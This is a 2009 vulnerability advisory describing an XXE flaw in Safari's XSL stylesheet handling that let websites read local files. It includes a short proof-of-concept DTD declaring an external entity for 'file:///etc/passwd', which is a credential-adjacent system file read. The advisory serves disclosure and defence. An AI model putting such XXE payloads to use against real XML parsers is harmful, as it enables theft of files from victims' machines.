CESA-2009-006 - rev 1

[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari local file theft bug

Programs affected: Safari prior to version 4
Severity: Websites can steal files from the victim's computer
Vendor URL (copy): APPLE-SA-2009-06-08-1
Initial report: Jun 2008

Safari was vulnerable to an XXE attack against a relatively obscure area of XML parsing. As a recap, XXE (Xml eXternal Entity) attacks abuse a built-in feature of XML to fetch files (or network resources) and embed them in an attacker's document. XXE attacks are most common server-side; this advisory notes a client-side attack against the Safari browser.

Safari's XSL stysheets were vulnerable to XXE attacks. By having a random XML file refer to an evil XSL resource (which is itself an XML-based format), the attacker can steal a local file by refering to it in the XSL resource's DTD.

Here's the code for the evil DTD:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
<xsl:template match="/">
Below you should see the content of a local file, stolen by this evil web page.


Click here for Safari 3 / MacOS

Click here for Safari 3 / Windows


CESA-2009-006 - rev 1
Chris Evans